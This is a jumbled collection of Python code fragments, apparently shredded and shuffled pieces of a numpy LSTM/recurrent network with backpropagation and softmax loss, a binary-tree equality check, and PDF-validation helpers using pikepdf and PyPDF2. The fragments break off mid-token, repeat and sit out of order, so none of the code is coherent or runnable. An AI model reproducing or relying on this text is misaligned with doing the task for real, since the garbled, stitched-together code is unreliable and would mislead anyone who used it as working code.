h0, 'c0':", "* previous_cell + \\ activations[t, :, 0:self.shape[1]] * activations[t, :, 3 * self.shape[1]:]", "+ self.shape[1]) * scale self.weights[-1, :] = 0 def reset(self): self.previous = None", "axis=0) dW = [None] * self.num_of_layers() for l in reversed(range(0, self.num_of_layers())): dW[l], dIn,", "to be used as the last non-recursive layer ''' def __call__(self, input): shifted_", "dW = np.zeros(self.weights.shape) dInput = np.zeros(inputs.shape) dIn = np.zeros([time_steps, batch, self.shape[0]]) dh0 =", "''' input is to be a rank 3 tensor ''' out = input", "None 
activation = None def __init__(self, shape, activation=identity()): self.shape = shape self.activation =", "[None] * self.num_of_layers() cache_out = [None] * self.num_of_layers() out = inputs for l", "To be used in combination with sofmax ''' def __call__(self, input, train_on): return", ":, 0:3 * self.shape[1]] *= (1.0 - activations[t, :, 0:3 * self.shape[1]]) *", "as its rows and dY holds dY_i as its rows In other words,", "def __call__(self, input_1, input_2): return np.mean(np.square(input_1 - input_2) / 2, axis=1,keepdims=True) def d(self,", "covered by a previous call to softmax_loss function ''' return 1 class softmax_loss:", "= np.zeros(inputs.shape) dIn = np.zeros([time_steps, batch, self.shape[0]]) dh0 = np.zeros([batch, self.shape[1]]) dH =", "= 1. / (1. + np.exp(-raws_[:, 0:3 * self.shape[1]])) activations[t, :, 3 *", "inputs[t].dot(self.weights) outputs[t] = self.activation(raws[t]) return outputs, {'inputs': inputs, 'raws': raws, 'outputs': outputs, 'h0':", "forget bias initialization as seen in the paper http://www.jmlr.org/proceedings/papers/v37/jozefowicz15.pdf section 2.2 ''' self.weights", "* (1 - input) class identity: def __call__(self, input): return input def d(self,", "1 class mean_square: def __call__(self, input_1, input_2): return np.mean(np.square(input_1 - input_2) / 2,", "self.shape[1] + 1, 4 * self.shape[1]) / np.sqrt( self.shape[0] + self.shape[1]) self.weights[-1, :]", "input_tensor[t] inputs[t, :, self.shape[0]:-1] = previous raws[t] = inputs[t].dot(self.weights) outputs[t] = self.activation(raws[t]) return", "len(dOut))): dAct = dH[t] * self.activation.d(outputs[t]) ''' the following line sums the gradients", "train_on]) def d(self, probs, train_on=None): ''' it computes the softmax loss derivative for", "self.weights[-1, :] = 0 if forget_bias_init != 0: self.weights[- 1, self.shape[1]:2 * self.shape[1]]", "= cost.d(out[t], predictions[t]) loss += np.sum(cost(out[t], predictions[t]), axis=0) dW = [None] * self.num_of_layers()", 
"returns 1, as the derivative is covered by a previous call to softmax_loss", "for l in self.layers: l.reset() def add(self, layer_): self.layers.append(layer_) def train_step(self, inputs, predictions,", "outputs[t - 1] if t > 0 else h0 inputs[t, :, -1] =", "self.shape[1]) * scale self.weights[-1,] = 0 def __call__(self, input_tensor): out, _ = self.eval_for_back_prop(input_tensor)", "* self.shape[1]:]) cells[t] = activations[t, :, self.shape[1]:2 * self.shape[1]] * previous_cell + \\", "other words, a product of two matrices is a sum of tensor products", "Let x be a single input and dY a single gradient Than dW=np.outer(x,dY)=x.T*dY", "time_steps, batch, out_ = outputs.shape dW = np.zeros(self.weights.shape) dInput = np.zeros(inputs.shape) dIn =", "not None and cache0[l] is not None: if cache0[l]['c0'] is not None and", "batch, out_]) loss=0 for t in reversed(range(0, time_steps)): dIn[t] = cost.d(out[t], predictions[t]) loss", "tmp_ class rNet: layers = [] num_of_layers = None def __init__(self): self.num_of_layers =", "the respected matrices ''' dW += np.dot(inputs[t].T, dAct[t]) dInput[t] = dAct[t].dot(self.weights.T) dIn[t] =", "cache, dCache=None, mask_start=0): inputs = cache['inputs'] outputs = cache['outputs'] activations = cache['activations'] cell_act", "= None weights = None previous = None cell = None def __init__(self,", "= l(out) return out def init(self): for l in self.layers: l.init() def reset(self):", "= dInput[t, :, 0:self.shape[0]] dh = dH[t - 1] if t > 0", "np.dot(inputs[t].T, dAct) dInput[t] = dAct.dot(self.weights.T) dIn[t] = dInput[t, :, 0:self.shape[0]] dh = dH[t", "derivative for optimality ''' tmp_ = np.copy(probs) tmp_[range(train_on.size), train_on] -= 1 return tmp_", "c0 = np.zeros([batch, self.shape[1]]) if h0 is None: h0 = np.zeros([batch, self.shape[1]]) for", "where x holds x_i as its rows and dY holds dY_i as its", "c0=None, h0=None, mask_start=0): time_steps, batch, in_ = input.shape inputs = np.zeros([time_steps, batch, 
self.shape[0]", "keepdims=True) def d(self, probs, train_on=None): ''' it returns 1, as the derivative is", "self.weights[-1,] = 0 def __call__(self, input_tensor): out, _ = self.eval_for_back_prop(input_tensor) return out def", "= outputs.shape dAct = np.zeros(activations.shape) dW = np.zeros(self.weights.shape) dInput = np.zeros(inputs.shape) dCell =", "np.zeros(activations.shape) dW = np.zeros(self.weights.shape) dInput = np.zeros(inputs.shape) dCell = np.zeros(cell.shape) dIn = np.zeros([time_steps,", "= np.random.randn(self.shape[0] + 1, self.shape[1]) / np.sqrt( self.shape[0] + self.shape[1]) * scale self.weights[-1,]", "+ \\ activations[t, :, 0:self.shape[1]] * activations[t, :, 3 * self.shape[1]:] cells_act[t] =", "self.layers[l].eval_for_back_prop(out) else: out, cache[l] = self.layers[l].eval_for_back_prop(out) cache_out[l] = { 'c0': cache[l]['cn'] if 'cn'", "exp_ / np.sum(exp_, axis=1, keepdims=True) def d(self, probs, train_on=None): ''' it returns 1,", "input_tensor.shape inputs = np.zeros([time_steps, batch, self.shape[0] + self.shape[1] + 1]) raws = np.zeros([time_steps,", "cache0[l]['c0'] is not None and cache0[l]['h0'] is not None: out, cache[l] = self.layers[l].eval_for_back_prop(out,", "* dCell[t] # dwrite_c dAct[t, :, 3 * self.shape[1]:] = activations[t, :, 0:self.shape[1]]", "be a rank 3 tensor ''' out = input for l in self.layers:", "tanh: def __call__(self, input): return np.tanh(input) def d(self, input): return 1 - input", "l in reversed(range(0, self.num_of_layers())): dW[l], dIn, dCache = self.layers[l].time_grad(dIn, cache=cache[l], dCache=None) return loss,", "axis=1, keepdims=True) def d(self, probs, train_on=None): ''' it returns 1, as the derivative", "outputs, cache = self.eval_for_back_prop(input=input_tensor, c0=self.cell, h0=self.previous) self.cell = np.copy(cache['cn']) self.previous = np.copy(cache['hn']) return", "0:self.shape[1]] = activations[t, :, 3 * self.shape[1]:] * dCell[t] # dwrite_c dAct[t, :,", "self.weights = 
np.random.randn(self.shape[0] + 1, self.shape[1]) / np.sqrt( self.shape[0] + self.shape[1]) * scale", "not None: out, cache[l] = self.layers[l].eval_for_back_prop(out, cache0[l]['h0']) else: out, cache[l] = self.layers[l].eval_for_back_prop(out) else:", "previous = outputs[t - 1] if t > 0 else h0 previous_cell =", "''' forget bias initialization as seen in the paper http://www.jmlr.org/proceedings/papers/v37/jozefowicz15.pdf section 2.2 '''", "self.weights = np.random.randn(self.shape[0] + self.shape[1] + 1, self.shape[1]) / np.sqrt( self.shape[0] + self.shape[1])", "batch, out_ = outputs.shape dW = np.zeros(self.weights.shape) dInput = np.zeros(inputs.shape) dIn = np.zeros([time_steps,", "self.activation = activation def init(self, scale=1): self.weights = np.random.randn(self.shape[0] + 1, self.shape[1]) /", "t in range(0, time_steps): previous = outputs[t - 1] if t > 0", "the matrix product dW=x.T*dY where x holds x_i as its rows and dY", "cells, 'cells_act': cells_act, 'h0': h0, 'c0': c0, 'hn': outputs[-1], 'cn': cells[-1]} def time_grad(self,", "!= 0: self.weights[- 1, self.shape[1]:2 * self.shape[1]] = forget_bias_init self.previous = None self.cell", "self.shape[1]] = forget_bias_init self.previous = None self.cell = None def reset(self): self.previous =", "'cells_act': cells_act, 'h0': h0, 'c0': c0, 'hn': outputs[-1], 'cn': cells[-1]} def time_grad(self, next_grad,", "*= (1.0 - activations[t, :, 3 * self.shape[1]:] ** 2) ''' the following", "0:self.shape[0]] dh = dH[t - 1] if t > 0 else dh0 dh", "self.cell = None def __call__(self, input_tensor): outputs, cache = self.eval_for_back_prop(input=input_tensor, c0=self.cell, h0=self.previous) self.cell", "''' Fully Connected recursive layer ''' shape = None weights = None previous", "as the derivative is covered by a previous call to softmax_loss function '''", "http://deeplearning.cs.cmu.edu/pdfs/Hochreiter97_lstm.pdf ''' shape = None weights = None previous = None cell =", "if t > 0 else h0 previous_cell = 
cells[t - 1] if t", "* input class sigmoid: def __call__(self, input): return 1 / (1 + np.exp(-input))", "range(0, self.num_of_layers()): if cache0 is not None and cache0[l] is not None: if", "self.shape[1]] = C_previous * dCell[t] dC_previous += activations[t, :, self.shape[1]:2 * self.shape[1]] *", "is not None and cache0[l] is not None: if cache0[l]['c0'] is not None", "dIn, dCache = self.layers[l].time_grad(dIn, cache=cache[l], dCache=None) return loss, dW, cache_out def save(self, path):", "None: if cache0[l]['c0'] is not None and cache0[l]['h0'] is not None: out, cache[l]", "outputs[t] = self.activation(raws[t]) return outputs, {'inputs': inputs, 'raws': raws, 'outputs': outputs, 'h0': h0,", "self.previous = None self.cell = None def reset(self): self.previous = None self.cell =", "= self.activation(raws[t]) return outputs, {'inputs': inputs, 'raws': raws, 'outputs': outputs, 'h0': h0, 'hn':", "time_steps, batch, in_ = input_tensor.shape inputs = np.zeros([time_steps, batch, self.shape[0] + self.shape[1] +", "activations[t, :, 3 * self.shape[1]:] * dCell[t] # dwrite_c dAct[t, :, 3 *", "out_ = outputs.shape dW = np.zeros(self.weights.shape) dInput = np.zeros(inputs.shape) dIn = np.zeros([time_steps, batch,", "np.sqrt( self.shape[0] + self.shape[1]) * scale self.weights[-1,] = 0 def __call__(self, input_tensor): out,", "+= dCache['dHidden'] for t in reversed(range(0, time_steps)): dCell[t] += (1 - cell_act[t] **", "init(self, forget_bias_init=3): ''' forget bias initialization as seen in the paper http://www.jmlr.org/proceedings/papers/v37/jozefowicz15.pdf section", "batch, self.shape[1]]) cells = np.zeros([time_steps, batch, self.shape[1]]) cells_act = np.zeros([time_steps, batch, self.shape[1]]) activations", "init(self, scale=1): self.weights = np.random.randn(self.shape[0] + self.shape[1] + 1, self.shape[1]) / np.sqrt( self.shape[0]", "class identity: def __call__(self, input): return input def d(self, input): return 1 class", "time_steps)): dIn[t] = 
cost.d(out[t], predictions[t]) loss += np.sum(cost(out[t], predictions[t]), axis=0) dW = [None]", "sums the gradients over the entire batch proof: Let x be a single", "weights = None previous = None activation = None def __init__(self, shape, activation=identity()):", "bias initialization as seen in the paper http://www.jmlr.org/proceedings/papers/v37/jozefowicz15.pdf section 2.2 ''' self.weights =", "np.zeros([time_steps, batch, self.shape[1]]) if h0 is None: h0 = np.zeros([batch, self.shape[1]]) for t", "def __init__(self, shape, activation=identity()): self.shape = shape self.activation = activation def init(self, scale=1):", "dOut, cache, dCache=None): inputs = cache['inputs'] outputs = cache['outputs'] time_steps, batch, out_ =", "class softmax_loss: ''' To be used in combination with sofmax ''' def __call__(self,", "class sigmoid: def __call__(self, input): return 1 / (1 + np.exp(-input)) def d(self,", "inputs for l in range(0, self.num_of_layers()): if cache0 is not None and cache0[l]", ":, self.shape[1]:2 * self.shape[1]] * previous_cell + \\ activations[t, :, 0:self.shape[1]] * activations[t,", "np.sum(cost(out[t], predictions[t]), axis=0) dW = [None] * self.num_of_layers() for l in reversed(range(0, self.num_of_layers())):", "self.shape[1]:3 * self.shape[1]] * dH[t] # dout dAct[t, :, 2 * self.shape[1]:3 *", "train_on=None): ''' it computes the softmax loss derivative for optimality ''' tmp_ =", "np.tanh(raws_[:, 3 * self.shape[1]:]) cells[t] = activations[t, :, self.shape[1]:2 * self.shape[1]] * previous_cell", "self.shape[1]]) raws = np.zeros([time_steps, batch, self.shape[1]]) for t in range(0, time_steps): inputs[t, :,", "def d(self, probs, train_on=None): ''' it returns 1, as the derivative is covered", "__call__(self, input): return np.tanh(input) def d(self, input): return 1 - input * input", "'h0': h0, 'hn': outputs[-1]} def time_grad(self, dOut, cache, dCache=None): inputs = cache['inputs'] outputs", "batch, self.shape[1]]) outputs = 
np.zeros([time_steps, batch, self.shape[1]]) if h0 is None: h0 =", "0:self.shape[1]] * activations[t, :, 3 * self.shape[1]:] cells_act[t] = np.tanh(cells[t]) outputs[t] = activations[t,", "the respected matrices ''' dW += np.dot(inputs[t].T, dAct) dInput[t] = dAct.dot(self.weights.T) dIn[t] =", "self.shape[1]:] * dCell[t] # dwrite_c dAct[t, :, 3 * self.shape[1]:] = activations[t, :,", "dAct[t, :, 3 * self.shape[1]:] *= (1.0 - activations[t, :, 3 * self.shape[1]:]", "matrices ''' dW += np.dot(inputs[t].T, dAct) dIn[t] = dAct.dot(self.weights.T)[:, 0:-1] return dW, dIn,", "self.eval_for_back_prop(input=input_tensor, c0=self.cell, h0=self.previous) self.cell = np.copy(cache['cn']) self.previous = np.copy(cache['hn']) return outputs def eval_for_back_prop(self,", "1 return tmp_ class rNet: layers = [] num_of_layers = None def __init__(self):", "dc0) # dforget dAct[t, :, self.shape[1]:2 * self.shape[1]] = C_previous * dCell[t] dC_previous", "input): return np.tanh(input) def d(self, input): return 1 - input * input class", "reversed(range(0, self.num_of_layers())): dW[l], dIn, dCache = self.layers[l].time_grad(dIn, cache=cache[l], dCache=None) return loss, dW, cache_out", "0:3 * self.shape[1]])) activations[t, :, 3 * self.shape[1]:] = np.tanh(raws_[:, 3 * self.shape[1]:])", "dCell[t] += (1 - cell_act[t] ** 2) * activations[t, :, 2 * self.shape[1]:3", "= np.zeros([batch, self.shape[1]]) if h0 is None: h0 = np.zeros([batch, self.shape[1]]) for t", "= input - np.max(input) exp_ = np.exp(shifted_) return exp_ / np.sum(exp_, axis=1, keepdims=True)", "and cache0[l] is not None: if cache0[l]['c0'] is not None and cache0[l]['h0'] is", "in_ = input.shape inputs = np.zeros([time_steps, batch, self.shape[0] + self.shape[1] + 1]) outputs", "np.zeros([time_steps, batch, self.shape[0]]) dh0 = np.zeros([batch, self.shape[1]]) dH = dOut.copy() if dCache is", "+ self.shape[1] + 1]) raws = np.zeros([time_steps, batch, self.shape[1]]) outputs = np.zeros([time_steps, batch,", "def 
__call__(self, input): return np.tanh(input) def d(self, input): return 1 - input *", "def __call__(self, input_tensor): out, _ = self.eval_for_back_prop(input_tensor) return out def eval_for_back_prop(self, input_tensor): time_steps,", "* self.num_of_layers() out = inputs for l in range(0, self.num_of_layers()): if cache0 is", "at: http://deeplearning.cs.cmu.edu/pdfs/Hochreiter97_lstm.pdf ''' shape = None weights = None previous = None cell", "dInput[t] = dAct[t].dot(self.weights.T) dIn[t] = dInput[t, :, 0:self.shape[0]] dh = dH[t - 1]", "in self.layers: out = l(out) return out def init(self): for l in self.layers:", "input, train_on): return -np.log(input[range(train_on.size), train_on]) def d(self, probs, train_on=None): ''' it computes the" ]
[ "root node of tree # @return an integer def isSameTree(self, A, B): if", "__name__ == \"__main__\": root1, root1.left, root1.right = TreeNode(1), TreeNode(2), TreeNode(3) root2, root2.left, root2.right", "root1.right = TreeNode(1), TreeNode(2), TreeNode(3) root2, root2.left, root2.right = TreeNode(1), TreeNode(2), TreeNode(3) print", "A is not None and B is not None: if A.val == B.val", "is None: return True if A is not None and B is not", "= None class Solution: # @param A : root node of tree #", "if A is not None and B is not None: if A.val ==", "= TreeNode(1), TreeNode(2), TreeNode(3) root2, root2.left, root2.right = TreeNode(1), TreeNode(2), TreeNode(3) print Solution().isSameTree(root1,", "TreeNode: def __init__(self, x): self.val = x self.left = None self.right = None", "node class TreeNode: def __init__(self, x): self.val = x self.left = None self.right", "node of tree # @return an integer def isSameTree(self, A, B): if A", ": root node of tree # @param B : root node of tree", "@return an integer def isSameTree(self, A, B): if A is None and B", "B.val and self.isSameTree(A.left, B.left) and self.isSameTree(A.right, B.right): return 1 return 0 if __name__", "self.val = x self.left = None self.right = None class Solution: # @param", "@param B : root node of tree # @return an integer def isSameTree(self,", "@param A : root node of tree # @param B : root node", "integer def isSameTree(self, A, B): if A is None and B is None:", "None and B is None: return True if A is not None and", "is not None: if A.val == B.val and self.isSameTree(A.left, B.left) and self.isSameTree(A.right, B.right):", "and self.isSameTree(A.left, B.left) and self.isSameTree(A.right, B.right): return 1 return 0 if __name__ ==", "binary tree node class TreeNode: def __init__(self, x): self.val = x self.left =", "tree # @param B : root node of tree # @return an integer", "class TreeNode: def __init__(self, x): self.val = x self.left = None self.right =", "None: if A.val == B.val and 
self.isSameTree(A.left, B.left) and self.isSameTree(A.right, B.right): return 1", "__init__(self, x): self.val = x self.left = None self.right = None class Solution:", "# @param A : root node of tree # @param B : root", "self.isSameTree(A.right, B.right): return 1 return 0 if __name__ == \"__main__\": root1, root1.left, root1.right", "tree # @return an integer def isSameTree(self, A, B): if A is None", "x self.left = None self.right = None class Solution: # @param A :", "Definition for a binary tree node class TreeNode: def __init__(self, x): self.val =", "class Solution: # @param A : root node of tree # @param B", "of tree # @param B : root node of tree # @return an", "== \"__main__\": root1, root1.left, root1.right = TreeNode(1), TreeNode(2), TreeNode(3) root2, root2.left, root2.right =", "a binary tree node class TreeNode: def __init__(self, x): self.val = x self.left", "def __init__(self, x): self.val = x self.left = None self.right = None class", "root1, root1.left, root1.right = TreeNode(1), TreeNode(2), TreeNode(3) root2, root2.left, root2.right = TreeNode(1), TreeNode(2),", "def isSameTree(self, A, B): if A is None and B is None: return", "node of tree # @param B : root node of tree # @return", "not None and B is not None: if A.val == B.val and self.isSameTree(A.left,", "self.isSameTree(A.left, B.left) and self.isSameTree(A.right, B.right): return 1 return 0 if __name__ == \"__main__\":", "A.val == B.val and self.isSameTree(A.left, B.left) and self.isSameTree(A.right, B.right): return 1 return 0", "and self.isSameTree(A.right, B.right): return 1 return 0 if __name__ == \"__main__\": root1, root1.left,", "= None self.right = None class Solution: # @param A : root node", "= x self.left = None self.right = None class Solution: # @param A", "root1.left, root1.right = TreeNode(1), TreeNode(2), TreeNode(3) root2, root2.left, root2.right = TreeNode(1), TreeNode(2), TreeNode(3)", "TreeNode(1), TreeNode(2), TreeNode(3) root2, root2.left, root2.right = TreeNode(1), 
TreeNode(2), TreeNode(3) print Solution().isSameTree(root1, root2)", "return 1 return 0 if __name__ == \"__main__\": root1, root1.left, root1.right = TreeNode(1),", "root2, root2.left, root2.right = TreeNode(1), TreeNode(2), TreeNode(3) print Solution().isSameTree(root1, root2) # Output 1", "1 return 0 if __name__ == \"__main__\": root1, root1.left, root1.right = TreeNode(1), TreeNode(2),", "B : root node of tree # @return an integer def isSameTree(self, A,", "B.right): return 1 return 0 if __name__ == \"__main__\": root1, root1.left, root1.right =", "is not None and B is not None: if A.val == B.val and", "return True if A is not None and B is not None: if", "== B.val and self.isSameTree(A.left, B.left) and self.isSameTree(A.right, B.right): return 1 return 0 if", "# Definition for a binary tree node class TreeNode: def __init__(self, x): self.val", "None: return True if A is not None and B is not None:", "is None and B is None: return True if A is not None", "\"__main__\": root1, root1.left, root1.right = TreeNode(1), TreeNode(2), TreeNode(3) root2, root2.left, root2.right = TreeNode(1),", "Solution: # @param A : root node of tree # @param B :", "isSameTree(self, A, B): if A is None and B is None: return True", "B): if A is None and B is None: return True if A", "return 0 if __name__ == \"__main__\": root1, root1.left, root1.right = TreeNode(1), TreeNode(2), TreeNode(3)", "A : root node of tree # @param B : root node of", "if __name__ == \"__main__\": root1, root1.left, root1.right = TreeNode(1), TreeNode(2), TreeNode(3) root2, root2.left,", "TreeNode(3) root2, root2.left, root2.right = TreeNode(1), TreeNode(2), TreeNode(3) print Solution().isSameTree(root1, root2) # Output", "None self.right = None class Solution: # @param A : root node of", "self.right = None class Solution: # @param A : root node of tree", "# @param B : root node of tree # @return an integer def", "self.left = None self.right = None class Solution: # @param A : root", "A is None and B is None: 
return True if A is not", "and B is not None: if A.val == B.val and self.isSameTree(A.left, B.left) and", "tree node class TreeNode: def __init__(self, x): self.val = x self.left = None", "TreeNode(2), TreeNode(3) root2, root2.left, root2.right = TreeNode(1), TreeNode(2), TreeNode(3) print Solution().isSameTree(root1, root2) #", "for a binary tree node class TreeNode: def __init__(self, x): self.val = x", ": root node of tree # @return an integer def isSameTree(self, A, B):", "x): self.val = x self.left = None self.right = None class Solution: #", "None class Solution: # @param A : root node of tree # @param", "B.left) and self.isSameTree(A.right, B.right): return 1 return 0 if __name__ == \"__main__\": root1,", "None and B is not None: if A.val == B.val and self.isSameTree(A.left, B.left)", "True if A is not None and B is not None: if A.val", "if A is None and B is None: return True if A is", "B is None: return True if A is not None and B is", "not None: if A.val == B.val and self.isSameTree(A.left, B.left) and self.isSameTree(A.right, B.right): return", "root node of tree # @param B : root node of tree #", "and B is None: return True if A is not None and B", "A, B): if A is None and B is None: return True if", "0 if __name__ == \"__main__\": root1, root1.left, root1.right = TreeNode(1), TreeNode(2), TreeNode(3) root2,", "B is not None: if A.val == B.val and self.isSameTree(A.left, B.left) and self.isSameTree(A.right,", "if A.val == B.val and self.isSameTree(A.left, B.left) and self.isSameTree(A.right, B.right): return 1 return", "# @return an integer def isSameTree(self, A, B): if A is None and", "an integer def isSameTree(self, A, B): if A is None and B is", "of tree # @return an integer def isSameTree(self, A, B): if A is" ]
[]
[ "10:00:02 GMT\\r\\nAccept-Ranges: bytes\\r\\nContent-Length: 5092104\\r\\nX-Content-Type-Options: nosniff\\r\\nConnection: close\\r\\nContent-Type: application/pdf\\r\\nStrict-Transport-Security: max-age=31536000; includeSubDomains; preload;\\r\\nX-Frame-Options: SAMEORIGIN\\r\\nX-XSS-Protection: 1; mode=block\\r\\nSet-Cookie:", "Exception as e: isOK[0] = 'NO' else: isOK[0] = 'YES' try: with open(filePath,", "__name__ == '__main__': # downloadInfo('https://www.abertis.com/informeanual2016/assets/pdfs/abertis-2016-integrated-annual-report.pdf') # #header = b'HTTP/1.1 200 OK\\r\\nDate: Sun, 28", "\"k\" #print(meta.pdfa_status) except Exception as e: isOK[0] = 'NO' else: isOK[0] = 'YES'", "# if \"pdf\" not in output: # return False # except Exception as", "# # dlReports = [info] def validatePDF(filePath): #print('validatePDF: ', filePath) return magic.from_file(filePath, mime=True)", "return [isOK, checkData] def validatePDF_test1(fileName): isOK = ['', ''] checkData = [] filePath", "print(getURLsFromExcelFile(excelFileList[0])) # info = downloadFile( # \"http://arpeissig.at/wp-content/uploads/2016/02/D7_NHB_ARP_Final_2.pdf\") # # dlReports = [info] def", "#if pdfFile.pages <= 0: # raise \"k\" #print(meta.pdfa_status) except Exception as e: isOK", "= magic.from_file(filePath, mime=True).lower() # if \"pdf\" not in output: # return False #", "#checkData = pdfFile.check() checkData.append(len(pdfFile.pages)) #checkData = [check, meta, status] #print(pdfFile.pages) if len(pdfFile.pages) <=", "0: raise \"k\" #print(meta.pdfa_status) except Exception as e: isOK[0] = 'NO' else: isOK[0]", "else: # return True def validatePDF_test2(fileName): isOK = \"\" checkData = [] filePath", "raise \"k\" #print(meta.pdfa_status) except Exception as e: isOK = \"False\" else: isOK =", "# dlReports = [info] def validatePDF(filePath): #print('validatePDF: ', filePath) return magic.from_file(filePath, mime=True) #", "pdfFile.open_metadata() #status = meta.pdfa_status #checkData = 
pdfFile.check() checkData.append(len(pdfFile.pages)) #checkData = [check, meta, status]", "application/pdf\\r\\nStrict-Transport-Security: max-age=31536000; includeSubDomains; preload;\\r\\nX-Frame-Options: SAMEORIGIN\\r\\nX-XSS-Protection: 1; mode=block\\r\\nSet-Cookie: HA_Abertis_CK=mia1rrwhlni; path=/; HttpOnly; Secure\\r\\n\\r\\n' # #print(header.decode('iso-8859-1'))", "isOK[0] = 'NO' else: isOK[0] = 'YES' try: with open(filePath, 'rb') as pdfFileObj:", "# downloadInfo('https://www.abertis.com/informeanual2016/assets/pdfs/abertis-2016-integrated-annual-report.pdf') # #header = b'HTTP/1.1 200 OK\\r\\nDate: Sun, 28 Nov 2021 12:45:04", "if __name__ == '__main__': # downloadInfo('https://www.abertis.com/informeanual2016/assets/pdfs/abertis-2016-integrated-annual-report.pdf') # #header = b'HTTP/1.1 200 OK\\r\\nDate: Sun,", "magic.from_file(filePath, mime=True).lower() # if \"pdf\" not in output: # return False # except", "fileName) try: pdfFile = pikepdf.open(filePath) #meta = pdfFile.open_metadata() #checkData.append(meta.pdfa_status) #checkData.append(meta['xmp:CreatorTool']) #checkData.append(pdfFile.check()) #checkData.append(len(pdfFile.pages)) #print(pdfFile.pages)", "[] filePath = os.path.join(downloadDir, fileName) try: pdfFile = pikepdf.open(filePath) #meta = pdfFile.open_metadata() #status", "isOK[0], isOK[1])) #print('%s %s' % (isOK[0], isOK[1])) return [isOK, checkData] # if __name__", "200 OK\\r\\nDate: Sun, 28 Nov 2021 12:45:04 GMT\\r\\nServer: Apache\\r\\nLast-Modified: Mon, 08 Jan 2018", "0: # raise \"k\" #print(meta.pdfa_status) except Exception as e: isOK = \"False\" else:", "else: isOK[1] = 'YES' #print('%s:\\n %s %s' % (fileName, isOK[0], isOK[1])) #print('%s %s'", "e: isOK = \"False\" else: isOK = \"True\" return [isOK, checkData] def validatePDF_test1(fileName):", "Apache\\r\\nLast-Modified: Mon, 08 Jan 2018 10:00:02 GMT\\r\\nAccept-Ranges: bytes\\r\\nContent-Length: 5092104\\r\\nX-Content-Type-Options: nosniff\\r\\nConnection: 
close\\r\\nContent-Type: application/pdf\\r\\nStrict-Transport-Security: max-age=31536000;", "getExcelFiles() # print(getURLsFromExcelFile(excelFileList[0])) # info = downloadFile( # \"http://arpeissig.at/wp-content/uploads/2016/02/D7_NHB_ARP_Final_2.pdf\") # # dlReports =", "Exception as e: # return False # else: # return True def validatePDF_test2(fileName):", "in output: # return False # except Exception as e: # return False", "= 'YES' #print('%s:\\n %s %s' % (fileName, isOK[0], isOK[1])) #print('%s %s' % (isOK[0],", "# return True def validatePDF_test2(fileName): isOK = \"\" checkData = [] filePath =", "return magic.from_file(filePath, mime=True) # try: # output = magic.from_file(filePath, mime=True).lower() # if \"pdf\"", "os.path.join(downloadDir, fileName) try: pdfFile = pikepdf.open(filePath) #meta = pdfFile.open_metadata() #checkData.append(meta.pdfa_status) #checkData.append(meta['xmp:CreatorTool']) #checkData.append(pdfFile.check()) #checkData.append(len(pdfFile.pages))", "\"False\" else: isOK = \"True\" return [isOK, checkData] def validatePDF_test1(fileName): isOK = ['',", "validatePDF_test1(fileName): isOK = ['', ''] checkData = [] filePath = os.path.join(downloadDir, fileName) try:", "= pdfFile.open_metadata() #checkData.append(meta.pdfa_status) #checkData.append(meta['xmp:CreatorTool']) #checkData.append(pdfFile.check()) #checkData.append(len(pdfFile.pages)) #print(pdfFile.pages) #if pdfFile.pages <= 0: # raise", "isOK[1])) #print('%s %s' % (isOK[0], isOK[1])) return [isOK, checkData] # if __name__ ==", "== '__main__': # downloadInfo('https://www.abertis.com/informeanual2016/assets/pdfs/abertis-2016-integrated-annual-report.pdf') # #header = b'HTTP/1.1 200 OK\\r\\nDate: Sun, 28 Nov", "= [] filePath = os.path.join(downloadDir, fileName) try: pdfFile = pikepdf.open(filePath) #meta = pdfFile.open_metadata()", "#checkData = [check, meta, status] #print(pdfFile.pages) if len(pdfFile.pages) <= 0: raise \"k\" #print(meta.pdfa_status)", 
"preload;\\r\\nX-Frame-Options: SAMEORIGIN\\r\\nX-XSS-Protection: 1; mode=block\\r\\nSet-Cookie: HA_Abertis_CK=mia1rrwhlni; path=/; HttpOnly; Secure\\r\\n\\r\\n' # #print(header.decode('iso-8859-1')) # for name,", "# return False # except Exception as e: # return False # else:", "Nov 2021 12:45:04 GMT\\r\\nServer: Apache\\r\\nLast-Modified: Mon, 08 Jan 2018 10:00:02 GMT\\r\\nAccept-Ranges: bytes\\r\\nContent-Length: 5092104\\r\\nX-Content-Type-Options:", "e: isOK[0] = 'NO' else: isOK[0] = 'YES' try: with open(filePath, 'rb') as", "PyPDF2.PdfFileReader(pdfFileObj) if pdfReader.numPages <= 0: raise \"k\" except Exception as e: isOK[1] =", "mime=True).lower() # if \"pdf\" not in output: # return False # except Exception", "0: raise \"k\" except Exception as e: isOK[1] = 'NO' else: isOK[1] =", "validatePDF_test2(fileName): isOK = \"\" checkData = [] filePath = os.path.join(downloadDir, fileName) try: pdfFile", "filePath = os.path.join(downloadDir, fileName) try: pdfFile = pikepdf.open(filePath) #meta = pdfFile.open_metadata() #status =", "'NO' else: isOK[1] = 'YES' #print('%s:\\n %s %s' % (fileName, isOK[0], isOK[1])) #print('%s", "(fileName, isOK[0], isOK[1])) #print('%s %s' % (isOK[0], isOK[1])) return [isOK, checkData] # if", "Jan 2018 10:00:02 GMT\\r\\nAccept-Ranges: bytes\\r\\nContent-Length: 5092104\\r\\nX-Content-Type-Options: nosniff\\r\\nConnection: close\\r\\nContent-Type: application/pdf\\r\\nStrict-Transport-Security: max-age=31536000; includeSubDomains; preload;\\r\\nX-Frame-Options: SAMEORIGIN\\r\\nX-XSS-Protection:", "GMT\\r\\nAccept-Ranges: bytes\\r\\nContent-Length: 5092104\\r\\nX-Content-Type-Options: nosniff\\r\\nConnection: close\\r\\nContent-Type: application/pdf\\r\\nStrict-Transport-Security: max-age=31536000; includeSubDomains; preload;\\r\\nX-Frame-Options: SAMEORIGIN\\r\\nX-XSS-Protection: 1; mode=block\\r\\nSet-Cookie: HA_Abertis_CK=mia1rrwhlni;", "try: # output = magic.from_file(filePath, mime=True).lower() # if \"pdf\" not in output: #", "= 
